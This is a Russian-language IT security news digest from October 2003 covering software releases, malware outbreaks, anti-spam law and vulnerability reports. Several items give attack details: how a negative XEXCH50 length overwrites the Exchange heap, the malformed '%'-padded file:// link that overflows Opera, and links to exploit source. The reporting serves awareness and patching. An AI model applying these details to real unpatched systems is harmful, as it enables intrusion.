Компания выпустила новую версию своего Openexchange Server с усовершенствованиями, нацеленными на повышение эффективности ПО электронной почты и календаря, альтернативного Microsoft Exchange Server. Для SuSE — второго по величине дистрибьютора Linux после Red Hat (данные IDC) — продукт Openexchange Server служит важным орудием конкурентной борьбы с Microsoft. Он заменяет Exchange на серверах, но на настольные ПК с Microsoft Outlook при этом нужно устанавливать специальный модуль. В новой версии Openexchange 4.1 учтены характерные жалобы заказчиков. Теперь входящие сообщения e-mail пересылаются на клиентские ПК автоматически, говорит генеральный менеджер американского отделения SuSE Холгер Дирофф. В прошлом новую почту нужно было проверять на сервере вручную. Это изменение стало возможным благодаря использованию новой технологии связи. Теперь с Openexchange Server можно сопрягать и другое ПО, например системы управления проектами. Около 70% заказчиков Openexchange пользуются продуктом взамен Microsoft Exchange, отметил Дирофф. В их числе производитель тяжелых машин Caterpillar, у которого с Openexchange работают около 800 клиентов Outlook. Caterpillar перенес свое серверное ПО с Exchange 5.5 на Openexchange Server в середине 2003 года. Подробности - http://www.zdnet.ru/?ID=308424
23/10/2003 15:42 Появление новой модификации червя Sexer.
"Лаборатория Касперского" предупреждает о распространении новой версии интернет-червя Sexer. Червь рассылает себя, маскируясь под сообщение технической службы "Лаборатории Касперского" с вложенным exe-файлом. При открытии файла-вложения происходит заражение компьютера. Зафиксировано несколько обращений от российских пользователей. Предыдущая версия вредоносной программы Sexer была обнаружена 15 октября этого года. Будучи ничем не примечательным с точки зрения технического исполнения, вирус представлял собой первый образец комбинированного использования методов социального инжиниринга и политических пиар-технологий. Автор новой версии вредоносной программы также ограничился примитивными техническими средствами, сделав ставку на психологию пользователя. Для распространения вредоносной программы используется один из излюбленных методов социального инжиниринга - фальсификация адреса отправителя, маскировка письма под сообщение технической службы производителя популярного программного обеспечения или антивирусной компании. В данном случае вредоносная программа рассылается якобы с адреса технической поддержки "Лаборатории Касперского" support@kaspersky.com. Тема письма: "Утилита для выявления и удаления почтовых червей". Письмо содержит вложенный файл KAVUtil.exe. Текст письма: "В связи с появлением в Сети нового почтового червя I-Worm.Sexer предлагаем Вам утилиту для выявления и удаления этого червя из системы. Описание I-Worm.Sexer доступно в Вирусной Энциклопедии Касперского по адресу: http://www.viruslist.com/viruslist.html". Червь получает управление, только если пользователь самостоятельно откроет вложенный файл. При открытии файла, вредоносная программа устанавливает фоном рабочего стола Windows картинку с текстом "АБОРТ - узаконенное убийство". Подробности - http://www.kaspersky.ru/news.html?id=143701094
23/10/2003 15:26 Сенат США одобрил антиспамерский закон: за спам будут сажать и штрафовать на миллион.
В Сенате США абсолютным большинством голосов был в среду одобрен федеральный законопроект, определяющий на государственном уровне правила рассылки по электронной почте так называемого спама - незапрошенных получателями коммерческих предложений. Как сообщает агентство Reuters, законопроект не предусматривает полного запрета на спам, однако вводит жесткие ограничения на методы его рассылки и разновидности рекламируемых товаров и услуг. Так, напрямую запрещается рассылать письма, вводящие получателей в заблуждение, рекламирующие противозаконные услуги и запрещенные медицинские препараты. По оценкам экспертов, подобные письма составляют до двух третей всего спама. Законопроект запрещает применение многих стандартных спамерских технологий: фальсификации обратного адреса, маскировки поля "Тема", автоматического перебора комбинаций букв с целью выявления действующих адресов, различных способов обхода антиспамерских фильтров. Предусматривается, что нарушители закона будут караться тюремным заключением на срок до одного года и штрафами на сумму до миллиона долларов. Злостные спамеры будут садиться в тюрьму на пять лет. Вместе с тем, частные лица не смогут подавать иски против спамеров: это будет разрешено лишь правоохранительным структурам и интернет-провайдерам. Подробнее - http://www.reuters.com/newsArticle.jhtml?type=topNews&storyID=3670981
22/10/2003 22:18 Применение Apache c mod_security.
На сайте SecurityFocus опубликована статья Ivan Ristic под оригинальным названием "Web Security Appliance With Apache and mod_security". Как следует из названия, статья описывает процесс построения безопасного Вэб-сервера Apache с применением модуля mod_security, основное предназначение которого - фильтрация потенциально опасных запросов к Вэб-серверу (об этом модуле мы писали вчера). Статья - http://www.securityfocus.com/infocus/1739
22/10/2003 21:33 Развитие темы уязвимости в Microsoft Exchange.
Как пишет довольно известный исследователь компьютерной безопасности HD Moore из DigitalOffence, им была исследована уязвимость, обнаруженная в Exchange 5.5/2000, которая заключается в возможности вызвать DoS при слишком большой длине параметра SMTP-команды "EHLO" (перекрывается патчем, приведённым в MS03-046). Исследуя код Exchange, автор обнаружил, что суть уязвимости заключается в команде XEXCH50. Данная команда, согласно спецификации, используется для передачи бинарных данных и имеет синтаксис XEXCH50 , где - длина посылаемых данных, а - всегда равно 2. При задании очень большого значения можно вызвать ситуацию исчерпания всей доступной памяти, потому что она выделяется в соответствии с длиной запроса. Также интересная особенность заключена в задании отрицательного значения , поскольку при этом память не выделяется, однако посылаемые данные принимаются - тем самым можно переписать адреса в куче (heap) и вызвать выполнение произвольного кода в памяти системы. Автором выпущен Перл-скрипт, позволяющий проверить Exchange-сервер на уязвимость. Утилита - http://metasploit.com/releases.html
22/10/2003 21:08 Компьютерные неприятности открывают в нас монстров.
Нецензурная брань, крики, вспышки ярости, жуткие стрессы – вот к чему приводят «ПК-паразиты», как спам, поп-окна и вирусы. Фирма Symantec утверждает, что компьютеры разрушают здоровье пользователей. Исследование проводилось среди британцев, но что-то подсказывает, что менталитет здесь не при чем. Поэтому данные сведения будут небезынтересны веб-серферам любой национальности. Итак, 86% пользователей Соединенного Королевства испытывают невероятное напряжение и раздраженность из-за компьютерных проблем. Только 14% обладают железными нервами и не волнуются «по пустякам». Были определены 5 главных неприятностей, которые приводят в бешенство. По степени раздражения лидирует медленное выполнение операций и сбои системы. Далее следуют «спам, мошенничество и большое количество электронной почты»(20%), «рекламные объявления в форме поп-окон (15%), вирусы (14%), а также потеря или удаление важных файлов (4%). Более подробно - http://www.runet.ru/news/4071.html
22/10/2003 20:46 Спамеры «захватывают широкополосные ПК».
Британская секьюрити-фирма утверждает, что спамеры из Китая и России превращают уязвимые домашние и офисные компьютеры в западных странах в источники спама. Этих распространителей спама «новой волны» — компьютеров, настроенных злоумышленниками на передачу тысяч массовых незатребованных сообщений, — становится все больше по мере того, как в домах и на предприятиях растет число постоянных широкополосных интернет-соединений, отмечает британская компания mi2g. «Многие из этих ПК не снабжены даже простейшим межсетевым экраном и не имеют никаких средств обнаружения вторжений, — говорится в отчете. — Другое преимущество использования домашних компьютеров в качестве станций распространения спама заключается в том, что им часто выдаются динамические IP-адреса... меняющиеся каждый раз, когда компьютер подключается к интернету... а это усложняет определение источника спама». Далее авторы отчета утверждают, что в последние месяцы в целях распространения спама стали использоваться домашние ПК и компьютеры малых предприятий Канады, Германии, Японии, Швейцарии, Великобритании и США, однако конкретные цифры и источник информации не приводятся. Подробнее - http://www.zdnet.ru/?ID=308317
22/10/2003 20:31 Выход SuSE Linux 9.
Немецкая компания SuSE Linux выпустила новую версию своей операционной системы. В SuSE Linux 9 появились многочисленные нововведения. По умолчанию система использует ядро Linux версии 2.4.21. В нем реализованы богатые мультимедийные возможности, функции по гибкому управлению энергопотреблением и т.д. Кроме того, в комплект поставки включено ядро версии 2.6, которое квалифицированные пользователи могут протестировать. SuSE Linux 9 реализована поддержка большого числа мультимедийных устройств и коммуникационного оборудования. В поставку системы вошли такие пакеты как менеджер рабочего стола KDE 3.1.4, офисный пакет OpenOffice.org 1.1, а также программа обмена сообщениями KDE Kopete, поддерживающая такие службы, как AOL Instant Messenger, MSN Messenger, IRC, ICQ, и Yahoo Messenger. Кроме этого, с ОС поставляется ПО для записи компакт-дисков и DVD, а также программы для работы со звуком. Одной из важнейших особенностей SuSE Linux 9 является полноценная поддержка новых 64-разрядных процессоров AMD Athlon 64 и Opteron. Пока SuSE Linux 9 является единственной настольной ОС, способной использовать расширенные 64-разрядные инструкции этих процессоров. Источник - http://www.suse.de
22/10/2003 20:18 Yahoo борется со спамом и вирусами.
В платной версии почтовой службы Yahoo появятся расширенные возможности по борьбе со спамом и вирусами, сообщает агентство Reuters. Новые возможности по фильтрации спама будут доступны исключительно платным пользователям Yahoo Mail в рамках сервиса Yahoo Mail Plus, который стоит 30 долларов США в год. Первый из новых способов борьбы со спамом называется AddressGuard и заключается в том, что пользователь может зарегистрировать один основной адрес и до 500 различных его вариантов для использования в ходе заполнения онлайновых форм. Все адреса изначально равноценны, но как только на какой-либо из них начнет приходить спам, его (адрес) можно незамедлительно отключить, чтобы оставить спамеров с носом. Второй способ под названием SpamGuard Plus более традиционен и предоставляет пользователям возможность самостоятельно устанавливать правила для фильтрации нежелательной электронной корреспонденции. Всем пользователям почты Yahoo теперь доступна возможность отображения писем только от известных корреспондентов (вариант фильтрации по "белому списку"). Кроме того, для всех пользователей изменены правила загрузки вложенных файлов - теперь все они в обязательном порядке проверяются на наличие вирусов. Подробности - http://story.news.yahoo.com/news?tmpl=story...
22/10/2003 20:05 Новый троянец Sdbot.N.
Вирусная лаборатория компании Panda Software PandaLabs зафиксировала появление нового и потенциально опасного троянца Sdbot.N (Bck/Sdbot.N). Этот вредоносный код позволяет хакерам наносить серьезный урон зараженным компьютерам. Чтобы усилить вредоносное воздействие, создатели Sdbot.N предприняли массовую рассылку троянца в письме с темой «Microsoft Security Update» и прикрепленным файлом, который называется MS03-047.EXE. В тексте письма его получателя уверяют, что оно послано корпорацией Microsoft. Поскольку Служба техподдержки компании уже Panda Software получила первые отчеты о заражениях, можно не сомневаться, что некоторые из адресатов «поймались» на эту уловку. Как только Sdbot.N запускается, он выводит сообщение «Update complete» и помещает себя резидентом в память компьютера. Кроме того, он создает серию записей в реестре Windows, чтобы быть уверенным в постоянном присутствии на компьютере, и копирует свой код в файл autoupdate.exe в системной директории Windows. У Sdbot.N есть свой собственный IRC клиент, поэтому он может соединяться с предварительно определенным каналом IRC, даже если на зараженном компьютере нет установленного IRC приложения. Благодаря этому соединению хакер может посылать на зараженный компьютер инструкции, включая приказы сканировать порты, посылать троянца или запускать атаки отказов в обслуживании. Источник - http://www.viruslab.ru
22/10/2003 19:42 Компьютерные вирусы поразили 85% китайских компьютеров.
Почти 85% персональных компьютеров Китая были в этом году заражены различными вирусными программами. Таковы данные специального исследования, проведенного китайскими правительственными экспертами, сообщает агентство "Синьхуа". Доля компьютерных вирусных инцидентов возросла на 1,59% по сравнению с прошлым годом и на 25,57% по сравнению с позапрошлым. Проникновение вредоносных программ обернулось определенными потерями приблизительно для 63% пользователей, что оказалось немного меньше по сравнению с прошлым годом. Главными источниками угрозы являются файлы, скачиваемые из интернета, сомнительные веб-сайты и приложения к электронным письмам. Как считают в Министерстве общественной безопасности Китая, компьютерные вирусы являются главной опасностью для национальных сетей. Источник - http://www.viruslist.com
22/10/2003 19:28 Самостабилизирующаяся Репликационная Файловая Система.
Как сообщает dotcoder на linux.org.ru, Nir Tzachar анонсировал новую файловую систему srFS, или "Self-Stabilizing Replication File System" (Самостабилизирующаяся Репликационная Файловая Система). "srFS - это глобальная файловая система, спроектированная для распределения по нескольким географическим точкам и для предоставления стойкой, высокодоступной и надежной инфраструктуры для информации." Подробности - http://kerneltrap.org/node/view/1033
22/10/2003 19:17 Microsoft вышла на американский рынок мобильных телефонов.
В США впервые начинаются продажи мобильных телефонов с функциями карманного персонального компьютера (так называемых "смартфонов"), оснащенных операционной системой Microsoft Smartphone 2002, сообщает IDG News Service. В Европе и Азии Подобные телефоны были представлены около года назад, однако на американский рынок Microsoft решила выйти лишь в этом году. Первым смартфоном, предназначенным для продажи в США, стала модель Motorola MPx200. Она работает в стандартах сотовой связи GSM 1800 и GSM 1900. Встроенное в телефон ПО включает в себя интернет-браузер, почтовый клиент и органайзер, предусмотрена возможность синхронизации с настольным ПК. Традиционно на рынке ОС для смартфонов доминирующее положение занимала британская компания Symbian. Эксперты считают, что Microsoft намеревается потеснить ее на этом рынке и имеет шансы на успех - об этом свидетельствует, в частности, сотрудничество с таким крупным производителем мобильных телефонов, как Motorola. Ну что - будем ждать троянов и DoS для сотовых? ;) Подробности - http://www.pcworld.com/news/article/0,aid,113043,00.asp
21/10/2003 15:25 DoCoMo и McAfee готовят мобильный антивирус.
Компания Network Associates, которая производит антивирусные программы McAfee, объявила о своем сотрудничестве с NTT DoCoMo в области создания антивирусного механизма для мобильных телефонов. Цель этой разработки — отвести угрозу злонамеренного кода от все более развитых мобильных устройств. Network Associates подготовила рабочий прототип своего антивирусного ПО McAfee для мобильных телефонов DoCoMo. Обе компании работали над ним с мая, хотя до сих пор не объявляли о партнерстве. Вирусы еще не стали серьезной проблемой для мобильных телефонов, которые гораздо проще ПК и функционируют в закрытых сетях. Однако аналитики утверждают, что это лишь дело времени. DoCoMo намерена использовать технологию, разработанную Network Associates, для защиты будущих версий телефонов поколений 2.5G и 3G. Крупнейший в мире оператор мобильной связи, обслуживающий 47 млн абонентов, компания DoCoMo наиболее широко известна своей сетью i-mode, поддерживающей передачу данных на мобильные трубки. Network Associates и DoCoMo планируют ввести антивирусную технологию в устройства DoCoMo к концу будущего года. Компании намерены передать некоторые свои технологии организации Open Mobile Alliance для использования в качестве промышленного стандарта. Подробности - http://news.zdnet.co.uk/internet/security/0,39020375,39117216,00.htm
21/10/2003 13:15 Выход mod_security 1.7.
Ivan Ristic от имени разработчиков сообщил о появлении новой версии (1.7) модуля для популярного Вэб-сервера Apache. Основное назначение этого модуля - защита уязвимых приложений (и криворуких скриптописателей - newsmaker), а также самого сервера от различных Вэб-атак. Помимо фильтрации запросов этот модуль ведёт лог-файл обращений к серверу. Защита строится на: фильтрации основных видов запросов (POST, GET, URI), фильтрация вводимых в запросе параметров, запрет атак типа внедрение SQL-запросов, запрет XSS-атак. Помимо улучшения типов защиты также включена поддержка для Novell Netware. Подробности - http://www.modsecurity.org/download/
21/10/2003 12:11 Тесты масштабируемости Linux и BSD.
Как пишет linux.org.ru, были проведены сравнения Linux 2.4, Linux 2.6, OpenBSD 3.4, FreeBSD 5.1 и NetBSD 1.6.1, в частности сетевых подсистем, управление процессами и памятью, операций с диском. Результаты говорят сами за себя, но основной вывод: масштабируемость Linux 2.6 достойна похвалы. Подробности - http://bulk.fefe.de/scalability/
21/10/2003 11:13 Мошенник использовал троянскую программу для биржевых махинаций.
Полиция США задержала 19-летнего жителя штата Пенсильвания Вана Дина (Van Dinh), подозреваемого в создании механизма мошенничества с использованием троянской программы, сообщает агентство AFP. Жертвой махинации стал инвестор из штата Массачусеттс, за счет которого хакер пытался избавиться от обесценившихся опционов. В распоряжении Ван Дина находилось большое количество контрактов, по условиям которых он мог приобретать акции компании Cisco Systems. Однако стоимость акций, указанная в опционах, превышала их рыночную стоимость и была выше 15 долларов. Извлечь прибыль из ценных бумаг Cisco Systems Ван Дин мог лишь в случае снижения их цены до 14 долларов за штуку. 19-летнего американца ожидал доход в размере около 912 тысяч долларов. Не дождавшись нужного ему снижения цены, Ван Дин решил избавиться от опционов с помощью мошеннической схемы и троянской программы. Согласно поступившим в распоряжение суда материалам, в июле этого года Ван Дин по электронной почте предложил участникам онлайнового биржевого форума воспользоваться новой программой для планирования сделок. В действительности программа Дина оказалась троянцем "Зверь" (The Beast), который позволял преступнику отслеживать биржевые сделки доверившихся предложению участников торгов. Получив доступ к учетной записи одного из участников торгов, Дин от его имени разместил запрос на приобретение обесценившихся опционов и избавился от них. В результате мошенник сумел избежать финансовых потерь в размере 37 тысяч долларов за счет доверчивого инвестора. Источник - http://www.viruslist.com
21/10/2003 10:41 Началось тестирование беты ProxyInspector.
Компания ADVSoft объявила о начале публичного бета- тестирования программного обеспечения ProxyInspector for ISA Server, Enterprise edition, предназначенного для анализа использования корпоративного доступа в интернет. Руководителям, начальникам ИТ-служб или системным администраторам он предоставляет возможность видеть, на что тратится рабочее время сотрудников и из посещения каких сайтов формируется трафик компании. Эта программа анализирует лог-файлы, прокси-сервера и выдает отчет о поведении пользователей локальной сети в Сети. С помощью ProxyInspector можно выявить самые активные рабочие станции, посмотреть, какие ресурсы они посещают, получить общее представление о распределении трафика по сайтам, протоколам, дням недели и времени суток. Вся информация представляется в удобной для восприятия форме и понятна даже не слишком опытному пользователю. В отличие от предыдущих, новая версия ProxyInspector for ISA Server обеспечивает поддержку нескольких, как состоящих в массиве, так и выделенных, ISA-серверов. Кроме того, эта программа позволяет синхронизировать свойства пользователей и групп пользователей с Active Directory, а также дает возможность хранить БД на Microsoft SQL Server или Interbase/Firebird. Источник - http://www.cnews.ru
21/10/2003 10:05 Состоялся официальный релиз Office System 2003.
Компания Microsoft объявила об официальном выходе в свет системы Microsoft Office 2003. Теперь Microsoft использует бренд Microsoft Office для чрезвычайно широкой гаммы продуктов, среди которых есть как всем известный интегрированный офисный пакет, так и самостоятельные программы и серверные решения. В систему Microsoft Office 2003 входят шесть вариантов интегрированного пакета, одиннадцать самостоятельных программ (в том числе Visio, Publisher, Project, FrontPage и другие), четыре серверных пакета (Exchange Server 2003, Project Server 2003, Live Connunication Server 2003), а также наборы инструментов для ускорения внедрения нового ПО корпоративными пользователями. Одним из основных нововведений в Office 2003 является внедрение поддержки формата XML во все приложения. Все программы позволяют сохранять документы как в собственных форматах, так и в виде XML. Кроме этого, в системе Office 2003 появился новый пакет InfoPath, предназначенный для создания и обработки XML-форм. Еще одной новой программой в системе Office 2003 является менеджер заметок OneNote. Это приложение позволяет делать короткие заметки и напоминания и упорядочивать их. Из уже известных пакетов наиболее серьезные изменения претерпел персональный информационный менеджер Outlook. В нем появились новые функции фильтрации спама, повысилась скорость работы при использовании медленных соединений с интернетом. Подробнее - http://www.compulenta.ru/2003/10/21/42721/
20/10/2003 21:26 Redfang - сканер Bluetooth.
Та же самая @stake Inc. представила широкой публике программу под названием Redfang (вышла версия 2.5), основное предназначение которой заключается в сканировании беспроводных сетей для обнаружения открытых Bloototh-устройств. Новая версия усовершенствована в части ускорения работы с использованием потоковой технологии и способна (теоретически) обнаруживать до 127 USB-устройств. Платформа - Linux (тестировалось на RedHat9 / Mandrake9.1). Подробности - http://www.atstake.com/research/tools/info_gathering/
20/10/2003 20:54 Уязвимость в Opera.
@stake, Inc, известная своими исследованиями в области компьютерной безопасности, сообщает о наличии уязвимости в браузере Opera. Было обнаружено, что при формировании ссылки, содержащей тэг <HREF определённого вида возникает переполнение буфера в куче (heap). При этом произвольные байты в куче могут быть перезаписаны, что может привести к взлому системы. Почтовый клиент Opera также бладает подобной уязвимостью, при этом при прочтении почты, содержащей специально сформированный URL может возникнуть ситуация, связанная с повреждением данных в нём. Уязвимость связана с некорректной обработкой движком браузера определённых символов в имени сервера, на который сссылается URL. В частности, подобная ссылка может иметь вид: <a href="file://server%%[many % characters]%%text"></a>. Пользователям браузера Opera рекомендуют обновиться до недавно вышедшей версии 7.21, в которой уязвимость ликвидирована. Уязвимы браузеры для всех платформ (тестировалось на WinXP/2K и GNU/Linux 2.4). Подробности - http://www.atstake.com/research/advisories/2003/a102003-1.txt
20/10/2003 19:15 Менеджер SMS-сообщений.
Для тех людей кто ведет активную переписку не только по электронной почте, но по SMS, знают, как важно бывает ответить на то или иное сообщение оперативно, а на некоторые не стоит обращать никого внимания. Для «больших систем» большинство функций реализует почтовый клиент, а пользователи смартфонов до недавнего времени не обладали подобными преимуществами. Как говориться: «свято место – пусто не бывает», и сторонние разработчики предлагают своё решения для пользователей смартфонов, работающих под управлением SymbianOS. SMSMachine, а именно так назвали разработчики свое детище, позволяет автоматически отвечать на SMS, вести «черный список» и использовать шаблоны сообщений. Конечно этого не так много, но начало положено. Подробности и внешний вид - http://www.mobile-review.com/news.php?language=ru#news1463
20/10/2003 19:08 У Subscribe.ru появился конкурент.
Сервис рассылки пресс-релизов от информационного канала Subscribe.ru по праву считается наиболее качественным по охвату аудитории инструментом распространения корпоративных новостей. Есть желающие отнять у питерской компании этот рынок. Пока о полноценной конкуренции речи быть не может, однако новостной портал The Chronicle делает акцент именно на распространении пресс-релизов, в то время как у Subscribe.ru это лишь одно из направлений бизнеса. На днях новички объявили о запуске "Виртуального пресс-центра" - бесплатного сервиса подготовки и распространения пресс-релизов для компаний из сферы малого и среднего бизнеса. Ориентирован он, как нетрудно догадаться, в первую очередь на тех, для кого распространение корпоративных новостей по легальным каналам по какой-то причине дается с трудом. "Конструктор пресс-релизов" помогает оформить новость и разослать ее в СМИ и журналистам. Всего в базе проекта на данный момент есть 348 корректных адресов, на которые примут материалы, а не отфильтруют как спам. Cайт проекта - http://www.thechronicle.ru/
20/10/2003 18:45 Румыния - цитадель хакеров.
Аналитики отмечают небывалую активность румынских хакеров. Как всегда, в основной массе это тинейджеры. И как всегда, виной тому - отсутствие законодательной базы и безработица в сфере ИТ. Особенности же ситуации заключаются в том, что румыны довольно хорошо организованы и связаны с другими европейскими и американскими хакерами. Все это привело к значительному росту киберпреступлений: ложных интернет-покупок, вымогательству и шантажу после взлома ИС, разарботке и распространению вирусов и червей. Отдельным индивидумам удалось даже взломать сервер исследовательской станции на Южном Полюсе и требовать у ученых выплат. Результатом разгула киберпреступности в стране стало принятие ряда жестких законов против хакеров, а также, десятки арестов (bugtraq.ru). Подробнее - http://www.rednova.com/news/stories/3/2003/10/20/story002.html
20/10/2003 18:02 Mozilla обретает популярность.
Как сообщает linux.org.ru, в связи с недавним выходом Mozilla 1.5, электронный журнал eWeek решил задать своим посетителям вопрос: "Означает ли выпуск новой версии Mozilla продолжение 'войны броузеров'?". Респондентам предлагалось выбрать один из трех вариантов ответа: "Я останусь с Internet Explorer", "Я предоставлю Mozilla второй шанс" и "Что такое война браузеров?". По состоянию на 18 октября, с большим отрывом лидирует второй вариант (примерно 62 процента опрошенных). Существование "войны браузеров" отрицает 20 процентов проголосовавших, а приверженцев IE среди них и того меньше - приблизительно 18 процентов. Подробности - http://www.eweek.com/poll_archive/0,3044,p=1254&bn=1,00.asp
20/10/2003 17:39 Microsoft запатентовала идентификацию с помощью файлов cookie
Как сообщает compulenta, Компания Microsoft получила от американского патентного ведомства патент 6,632,248 в области интернет-технологий. На этот раз компания изобрела способ показа пользователю индивидуально настроенных веб-страниц с помощью специальных идентификаторов, хранящихся на клиентском компьютере. В описании изобретения приводится следующая его характеристика: при первом посещении сайта пользователь настраивает вид страницы. Эта информация запоминается сервером, а на клиентский компьютер записывается уникальный идентификатор. При следующем посещении сервер считывает идентификатор и выводит страницу в соответствии с сохраненными настройками. По сути, это тот же принцип, что используется при идентификации пользователей с помощью файлов cookie. Противники софтверных патентов уже назвали новый патент Microsoft еще одним доказательством в пользу абсурдности патентования программ. Подробности - http://patft.uspto.gov/netacgi/nph-Parser?...
20/10/2003 17:04 Microsoft проясняет ситуацию с выходом сервис-пака к Windows XP.
Компания Microsoft несколько прояснила ситуацию с графиком выхода сервис-паков для операционной системы Windows XP. В августе этого года софтверный гигант скорректировал график выхода обновлений для этой операционной системы, сместив выход второго сервис-пака для Windows XP с конца 2003 г. на середину 2004 года. Вместо сервис-пака Microsoft выпустила набор критических патчей под названием Update Rollup 1. Он, конечно, не может заменить собой сервис-пак, где, помимо латания дыр, часто реализуются дополнительные изменения, но более удобен в установке, чем набор из индивидуальных патчей, каждый из которых требует отдельной установки. Однако на прошедшей неделе один из руководителей Microsoft Ричард Каплан, выступая на конференции Citrix iForum, сообщил, что второй сервис-пак для Windows XP увидит свет именно в 2003 году, а не в 2004. Кроме того, Каплан еще раз подтвердил слова Стива Баллмера о том, что обновления к своим продуктам Microsoft будет выпускать по четкому графику - один раз в месяц. После выступления Каплана планы Microsoft относительно сервис-пака для Windows XP стали еще туманнее. Чтобы развеять сомнения, Microsoft распространила официальное заявление, в котором говорится, что в 2003 году будет выпущена только бета-версия второго сервис-пака для Windows XP, а окончательный его релиз состоится в середине 2004 года. Источник - http://www.zdnet.ru
20/10/2003 16:20 Недельный отчет о вирусах Panda Software.
Опубликован традиционный еженедельный отчёт о вирусной активности прошедшей недели от компании Panda Software. В отчете представлены отчёты о наиболее заметных вирусах прошедшей недели - Esepor.A, Mafia.A и 'K' версию Istbar, а также червя Logpole.A. Более подробно об оных можно почитать в ссылке, приведённой ниже. Подробности - http://www.viruslab.ru/press/index.php?go=show&num=201
20/10/2003 15:58 Новый Microsoft Office защитит электронную почту вопреки американским законам.
Компания Microsoft сообщила о том, что последняя версия популярного пакета программ Microsoft Office 2003, продажи которого начнутся во вторник, будет содержать почтовый клиент, позволяющий пользователям отправлять электронные письма, способные в заданное время "самоуничтожаться". Как сообщает BBC News, данная разработка - Information Rights Management - призвана повысить безопасность электронной переписки и избавить пользователей от получения не дошедшей до адресата корреспонденции. Microsoft заявляет также, что пользователи смогут давать выборочный доступ пользователей к своим письмам и запрещать пересылку своих сообщений на другие адреса и их распечатку. Производитель считает, что почтовый клиент с расширенными функциями будет полезен правительственным и коммерческим организациям, в частности, как средство предотвращения утечки важной информации. Также Microsoft Office 2003 будет способен более эффективно защищать конфиденциальную информацию, содержащуюся в файлах Microsoft Excel и Word. Тем временем, некоторые новые функции пакета не соответствуют американскому законодательству. В частности, уничтожение электронных писем является федеральным преступлением. Подробности - http://news.bbc.co.uk/2/hi/business/3205080.stm
19/10/2003 18:28 Уязвимость в веб-интерфейсе HotBox.RU.
Как нам сообщил ERRor, в веб-интерфейсе одного из крупнейших российских почтовых порталов - HotBox.RU существует такая же проблема, как и в Hotmail. Движок веб-интерфейса чтения писем не фильтрует тег <iframe>. Администрация портала уведомлена о данной уязвимости. Источник - http://www.uinc.ru
19/10/2003 18:06 Выход Linux 2.6.0-test8.
Линус Торвальдс выпустил восьмую тестовую версию новой версии ядра Linux - 2.6.0. По отзывам специалистов, прошлая версия (7-я) была не очень. Подробности - http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.0-test8
19/10/2003 17:30 Эксплоит уязвимости сервиса Messenger.
На сайте securitylab.ru выложен исходник эксплоита уязвимости в сервисе Messenger ОС WinXP/2K. Автор эксплоита LSD. Предназначен для компиляции на платформе win32. Описание работы понятно из комментариев. Исходник - http://www.securitylab.ru/_exploits/w2k_mess.c.txt
19/10/2003 17:17 Утилита для удаления cервиса Messenger.
Как мы сообщали ранее, вышла серия бюллетеней от Microsoft, в которых описываются многочисленные уязвимости в семействе ОС этой корпорации. Одна из уязвимостей обнаружена в сервисе Messenger, предназначенного для обмена пользователями в локальной сети всплывающими (pop-up) cообщениями. Корпорация GRC (Gibson Research Corporation, CША, Калифорния) выпустила специальную утилиту, которая отключает этот сервис в операционных системах XP/2K. Утилита - http://grc.com/files/ShootTheMessenger.exe
19/10/2003 17:14 Apple выпустила iTunes для Windows.
В четверг компания Apple Computer представила Windows-версию своего популярного музыкального ПО и магазина iTunes — редкий случай отступления от платформы Macintosh. Как и вышедшая в апреле iTunes Music Store для Macintosh (Windows-версию компания тогда обещала выпустить к концу этого года), новая версия ПО для Windows распространяется бесплатно и предлагает доступ «одним кликом» к музыкальным записям из обширного каталога (большинство песен продается по 99 центов). Новый сервис Windows iTunes, совместимый с Windows 2000 и XP, по форме и содержанию не отличается от Мас-версии. Он поддерживает формат с защитой от копирования Apple Advanced Audio Coding и формат МР3 — но не Microsoft Windows Media Audio (WMA). Подробности - http://www.zdnet.ru/?ID=308120
19/10/2003 17:05 Longhorn обойдется дороже полёта на Луну
Как сообщает compulenta, компания Microsoft делает очень большую ставку на свою операционную систему Longhorn, появление которой на рынке ожидается в 2005-2006 году. Это еще раз подтвердил основатель и главный разработчик Microsoft Билл Гейтс. Выступая на конференции Etre в Германии, Гейтс отметил, что в разработку Longhorn Microsoft вложила столько же денег, сколько в свое время вложили США в организацию полета человека на Луну. Конечно, за несколько десятилетий инфляция сделала несопоставимыми суммы, затраченные на лунную программу и разработку Longhorn. Однако параллели между полетом человека на Луну и выпуском Longhorn более глубоки - Microsoft старается представить выход новой операционки огромным достижением для человечества. Подробности - http://www.theinquirer.net/?article=12143
19/10/2003 16:48 Установлен новый рекорд скорости передачи данных по Интернету.
Группа специалистов из европейского ядерного центра ЦЕРН и Калифорнийского технологического института установила новый рекорд скорости передачи данных по Интернету. Как говорится в пресс-релизе на сайте ЦЕРНа, 1,1 терабайта информации было передано на расстояние в 7 тысяч километров менее чем за 30 минут. Средняя скорость трафика составила 5,44 гигабита в секунду, что примерно в 20 тысяч раз превышает скорость передачи данных по стандартной широкополосной линии. Комментируя результаты эксперимента, один из его участников Харви Ньюман (Harvey Newman) заявил, что каналы связи со скоростью до 10 гигабит в секунду станут широко распространенными в сравнительно недалеком будущем. Предыдущий рекорд был установлен в феврале этого года специалистами ЦЕРНа, Калифорнийского технологического института, американской Национальной лаборатории в Лос-Аламосе и Стэнфордского центра линейных ускорителей. Тогда удалось достичь средней скорости обмена в 2,38 гигабита в секунду. Пресс-релиз - http://info.web.cern.ch/info/Press/PressReleases/Releases2...
18/10/2003 19:29 Утилита сканирования уязвимых Windows-систем.
Ранее мы сообщали о целой куче обновлений, недавно выпущенных Microsoft. Cреди них есть и обновление, которое закрывает уязвимость в сервисе Messenger. Известная в кругах компьютерной безопасности компания ISS выпустила утилиту, при помощи которой можно проверять наличие этой уязвимости. Напомним, что бюллетень, который описывает уязвимость носит код MS03-043. Утилита работает из командной строки и сканирует или одиночные IP-адреса, или диапазон оных. Утилита - http://download.iss.net/eval/internet_scanner/scanmsgr.exe
18/10/2003 19:11 Обзор FreeBSD 5.1.
На сайте The Jem Report опубликован обзор последней версии популярной ОС FreeBSD 5-й ветки - 5.1. Помимо описанию различных нововведений в этой версии FreeBSD рассматриваются также: инсталляция, обновление, возможность работы с файловыми системами других ОС. Обзор - http://www.thejemreport.com/software/freebsd51.php
18/10/2003 18:23 Quota mini-HOWTO.
На сайте Linux gazette опубликован довольно полезный перевод mini-HOWTO, написанного в оригинале Ральфом ван Дуреном "Quota mini-HOWTO", посвящённого, как следует из названия, описанию процесса квотирования (наложения ограничений) на размер файловых систем в ОС Linux. Перевод выполнен Иваном Песиным. Статья - http://gazette.linux.ru.net/rus/articles/quota_mini-howto.html
